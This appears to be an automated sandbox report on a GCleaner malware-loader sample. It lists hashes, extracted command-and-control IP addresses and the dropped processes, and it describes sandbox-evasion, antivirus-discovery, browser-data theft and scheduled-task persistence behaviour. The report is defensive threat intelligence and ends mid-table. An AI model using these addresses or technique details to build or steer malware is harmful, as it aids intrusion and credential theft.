gcleaner | 6f45d7e90e66228095d980654e81b524ab8ff1401eeb1f5bda0fd10b4f05b1be

Analysis

max time kernel
151s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
06-04-2023 17:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

trainerv_LbkGolm7.exe
Size

4.4MB
MD5

b0d315aec673586bdd8df809d85d39d8
SHA1

3265a10ef073cc1cd822c660481d213efbc11be5
SHA256

6f45d7e90e66228095d980654e81b524ab8ff1401eeb1f5bda0fd10b4f05b1be
SHA512

bb9de0a39922e74c2956e45798d816891a19a3d638bbb414ddb22d9ff2bd099a735df7a7129c298cf749be1045a15e5613fcc636ca9661ee8b6a13e61a66099b
SSDEEP

98304:8Q4mWqUpwcEzrTP30I3GuGTCXN7AHNSQ9cf1pp9b2zN2i1ZewTXcq:ZRUmcorToBT44JMTnbIJZeqXcq

Score

10^/10

gcleaner discovery loader spyware stealer

Malware Config

Extracted

Family

gcleaner

85.31.45.39

85.31.45.250

85.31.45.251

85.31.45.88

Signatures

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Downloads MZ/PE file
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mzcc2mvyIAWsNP6.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mzcc2mvyIAWsNP6.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	mzcc2mvyIAWsNP6.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mzcc2mvyIAWsNP6.exeFileDate46.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	mzcc2mvyIAWsNP6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	FileDate46.exe

Executes dropped EXE 15 IoCs

Processes:

is-BBKOB.tmpCR_DBF.exeCR_DBF.exePFDXMs1Ymv.exemzcc2mvyIAWsNP6.exeis-DNAA5.tmp2E4pfl7VJy4paYc.exeis-SVK5I.tmpFileDate46.exeZerkalo331.exeEmPxeJw8dA.exeZerkalo331.exeis-O1LR1.tmpSyncBackupShell.exemIwgqVf.exe

pid	process
1936	is-BBKOB.tmp
4976	CR_DBF.exe
1044	CR_DBF.exe
2956	PFDXMs1Ymv.exe
1380	mzcc2mvyIAWsNP6.exe
2088	is-DNAA5.tmp
2284	2E4pfl7VJy4paYc.exe
4704	is-SVK5I.tmp
5228	FileDate46.exe
5252	Zerkalo331.exe
5776	EmPxeJw8dA.exe
5864	Zerkalo331.exe
6004	is-O1LR1.tmp
5908	SyncBackupShell.exe
1080	mIwgqVf.exe

Loads dropped DLL 10 IoCs

Processes:

is-BBKOB.tmpis-DNAA5.tmpis-SVK5I.tmpis-O1LR1.tmp

pid	process
1936	is-BBKOB.tmp
1936	is-BBKOB.tmp
1936	is-BBKOB.tmp
2088	is-DNAA5.tmp
4704	is-SVK5I.tmp
4704	is-SVK5I.tmp
4704	is-SVK5I.tmp
6004	is-O1LR1.tmp
6004	is-O1LR1.tmp
6004	is-O1LR1.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Checks for any installed AV software in registry 1 TTPs 4 IoCs

Security Software Discovery

T1063

Processes:

CR_DBF.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build	CR_DBF.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop	CR_DBF.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop	CR_DBF.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop\Build	CR_DBF.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 6 IoCs

Processes:

mzcc2mvyIAWsNP6.exepowershell.exepowershell.exemIwgqVf.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	mzcc2mvyIAWsNP6.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	mIwgqVf.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	mIwgqVf.exe

Drops file in Program Files directory 54 IoCs

Processes:

is-O1LR1.tmpis-BBKOB.tmpis-DNAA5.tmpSyncBackupShell.exesetup.exe

description	ioc	process
File created	C:\Program Files (x86)\BTngBackup\is-JP6M6.tmp	is-O1LR1.tmp
File created	C:\Program Files (x86)\CR DBF\is-FIKAN.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\CR DBF\is-LRK8O.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\CR DBF\Demo\Supl\is-7N1SC.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\CR DBF\Demo\Supl\is-QN4VT.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\BTngBackup\is-HBHE2.tmp	is-O1LR1.tmp
File created	C:\Program Files (x86)\CR DBF\is-SB5EI.tmp	is-BBKOB.tmp
File opened for modification	C:\Program Files (x86)\CR DBF\CR_DBF.exe	is-BBKOB.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-87HT3.tmp	is-DNAA5.tmp
File created	C:\Program Files (x86)\BTngBackup\Languages\is-OFM06.tmp	is-O1LR1.tmp
File created	C:\Program Files (x86)\BTngBackup\is-0LMMD.tmp	is-O1LR1.tmp
File created	C:\Program Files (x86)\BTngBackup\Help\is-2G41M.tmp	is-O1LR1.tmp
File created	C:\Program Files (x86)\CR DBF\Demo\is-SLTIE.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\CR DBF\Demo\Supl\is-7TAT5.tmp	is-BBKOB.tmp
File opened for modification	C:\Program Files (x86)\CR DBF\RepairDbf.ini	is-BBKOB.tmp
File opened for modification	C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe	is-DNAA5.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-MOKSR.tmp	is-DNAA5.tmp
File opened for modification	C:\Program Files (x86)\Zerkalo 1.5\unins000.dat	is-DNAA5.tmp
File opened for modification	C:\Program Files (x86)\BTngBackup\unins000.dat	is-O1LR1.tmp
File created	C:\Program Files (x86)\CR DBF\Demo\Supl\is-70DF1.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\CR DBF\is-70U0T.tmp	is-BBKOB.tmp
File opened for modification	C:\Program Files (x86)\CR DBF\unins000.dat	is-BBKOB.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-VF63P.tmp	is-DNAA5.tmp
File created	C:\Program Files (x86)\CR DBF\Demo\is-PL17A.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\BTngBackup\is-26VP2.tmp	is-O1LR1.tmp
File created	C:\Program Files (x86)\BTngBackup\is-DQFTO.tmp	is-O1LR1.tmp
File created	C:\Program Files (x86)\BTngBackup\Help\images\is-DDE8I.tmp	is-O1LR1.tmp
File opened for modification	C:\Program Files (x86)\BTngBackup\SyncBackupShell.exe	is-O1LR1.tmp
File created	C:\Program Files (x86)\CR DBF\is-A8BJD.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\CR DBF\Demo\Supl\is-EJNTR.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\CR DBF\unins000.dat	is-BBKOB.tmp
File created	C:\Program Files (x86)\BTngBackup\Help\images\is-RDOE7.tmp	is-O1LR1.tmp
File created	C:\Program Files (x86)\clFlow	SyncBackupShell.exe
File created	C:\Program Files (x86)\Zerkalo 1.5\unins000.dat	is-DNAA5.tmp
File created	C:\Program Files (x86)\CR DBF\Demo\is-9960G.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\b3877b68-27ef-4930-a011-056b0d171809.tmp	setup.exe
File created	C:\Program Files (x86)\BTngBackup\Help\is-HNUHI.tmp	is-O1LR1.tmp
File created	C:\Program Files (x86)\BTngBackup\Help\images\is-4MR2F.tmp	is-O1LR1.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-I9MEH.tmp	is-DNAA5.tmp
File created	C:\Program Files (x86)\BTngBackup\is-RLUQN.tmp	is-O1LR1.tmp
File created	C:\Program Files (x86)\CR DBF\is-VMUE2.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\CR DBF\Demo\is-SM3K9.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\CR DBF\Demo\Supl\is-6S0FR.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-3CIFT.tmp	is-DNAA5.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-KFDG6.tmp	is-DNAA5.tmp
File created	C:\Program Files (x86)\CR DBF\Demo\is-75LKC.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\BTngBackup\is-CG636.tmp	is-O1LR1.tmp
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230406195235.pma	setup.exe
File created	C:\Program Files (x86)\BTngBackup\Help\images\is-LPCVN.tmp	is-O1LR1.tmp
File created	C:\Program Files (x86)\CR DBF\Demo\Supl\is-NKS93.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\CR DBF\is-4CNPG.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\CR DBF\is-3T3GL.tmp	is-BBKOB.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-213KF.tmp	is-DNAA5.tmp
File created	C:\Program Files (x86)\BTngBackup\unins000.dat	is-O1LR1.tmp

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\bIxjpVXoYOizHLMzgM.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\bIxjpVXoYOizHLMzgM.job	schtasks.exe

Program crash 53 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
316	4976	WerFault.exe	CR_DBF.exe
2032	4976	WerFault.exe	CR_DBF.exe
1228	4976	WerFault.exe	CR_DBF.exe
3492	4976	WerFault.exe	CR_DBF.exe
1840	1044	WerFault.exe	CR_DBF.exe
4280	1044	WerFault.exe	CR_DBF.exe
4168	1044	WerFault.exe	CR_DBF.exe
3600	1044	WerFault.exe	CR_DBF.exe
4772	1044	WerFault.exe	CR_DBF.exe
3808	1044	WerFault.exe	CR_DBF.exe
3836	1044	WerFault.exe	CR_DBF.exe
4740	1044	WerFault.exe	CR_DBF.exe
1904	1044	WerFault.exe	CR_DBF.exe
4704	1044	WerFault.exe	CR_DBF.exe
852	1044	WerFault.exe	CR_DBF.exe
968	1044	WerFault.exe	CR_DBF.exe
4236	1044	WerFault.exe	CR_DBF.exe
3912	1044	WerFault.exe	CR_DBF.exe
3008	1044	WerFault.exe	CR_DBF.exe
1160	1044	WerFault.exe	CR_DBF.exe
3116	1044	WerFault.exe	CR_DBF.exe
1948	1044	WerFault.exe	CR_DBF.exe
4280	1044	WerFault.exe	CR_DBF.exe
2956	1044	WerFault.exe	CR_DBF.exe
2088	1044	WerFault.exe	CR_DBF.exe
1452	1044	WerFault.exe	CR_DBF.exe
4360	1044	WerFault.exe	CR_DBF.exe
3112	1044	WerFault.exe	CR_DBF.exe
5004	1044	WerFault.exe	CR_DBF.exe
4804	1044	WerFault.exe	CR_DBF.exe
960	1044	WerFault.exe	CR_DBF.exe
1840	1044	WerFault.exe	CR_DBF.exe
912	1044	WerFault.exe	CR_DBF.exe
4684	1044	WerFault.exe	CR_DBF.exe
3912	1044	WerFault.exe	CR_DBF.exe
984	1044	WerFault.exe	CR_DBF.exe
2216	1044	WerFault.exe	CR_DBF.exe
5340	1044	WerFault.exe	CR_DBF.exe
5496	1044	WerFault.exe	CR_DBF.exe
396	1044	WerFault.exe	CR_DBF.exe
5588	1044	WerFault.exe	CR_DBF.exe
5880	1044	WerFault.exe	CR_DBF.exe
5220	1044	WerFault.exe	CR_DBF.exe
388	1044	WerFault.exe	CR_DBF.exe
4520	1044	WerFault.exe	CR_DBF.exe
6136	1044	WerFault.exe	CR_DBF.exe
5992	1044	WerFault.exe	CR_DBF.exe
5388	1044	WerFault.exe	CR_DBF.exe
2276	1044	WerFault.exe	CR_DBF.exe
5476	1044	WerFault.exe	CR_DBF.exe
5520	1044	WerFault.exe	CR_DBF.exe
3060	1044	WerFault.exe	CR_DBF.exe
2896	1044	WerFault.exe	CR_DBF.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

5616 schtasks.exe
5612 schtasks.exe
5552 schtasks.exe

pid	process
5616	schtasks.exe
5612	schtasks.exe
5552	schtasks.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exemsedge.exemzcc2mvyIAWsNP6.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mzcc2mvyIAWsNP6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	mzcc2mvyIAWsNP6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4168 taskkill.exe

pid	process
4168	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Runs net.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

CR_DBF.exemsedge.exemsedge.exeidentity_helper.exepowershell.EXEchrome.exepowershell.exepowershell.exepowershell.EXE

pid	process
1044	CR_DBF.exe
1044	CR_DBF.exe
1044	CR_DBF.exe
1044	CR_DBF.exe
1864	msedge.exe
1864	msedge.exe
5000	msedge.exe
5000	msedge.exe
2220	identity_helper.exe
2220	identity_helper.exe
6124	powershell.EXE
6124	powershell.EXE
6124	powershell.EXE
1044	CR_DBF.exe
1044	CR_DBF.exe
1044	CR_DBF.exe
1044	CR_DBF.exe
5748	chrome.exe
5748	chrome.exe
1044	CR_DBF.exe
1044	CR_DBF.exe
5476	powershell.exe
5476	powershell.exe
5476	powershell.exe
2080	powershell.exe
2080	powershell.exe
2080	powershell.exe
1872	powershell.EXE
1872	powershell.EXE
1872	powershell.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

Processes:

msedge.exechrome.exe

pid	process
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exepowershell.EXEchrome.exepowershell.exepowershell.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	4168	taskkill.exe
Token: SeDebugPrivilege	6124	powershell.EXE
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeDebugPrivilege	5476	powershell.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeDebugPrivilege	1872	powershell.EXE
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe
Token: SeCreatePagefilePrivilege	5748	chrome.exe
Token: SeShutdownPrivilege	5748	chrome.exe

Suspicious use of FindShellTrayWindow 30 IoCs

Processes:

msedge.exechrome.exe

pid	process
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe
5748	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

trainerv_LbkGolm7.exeis-BBKOB.tmpnet.exenet.exeCR_DBF.exemsedge.exe

description	pid	process	target process
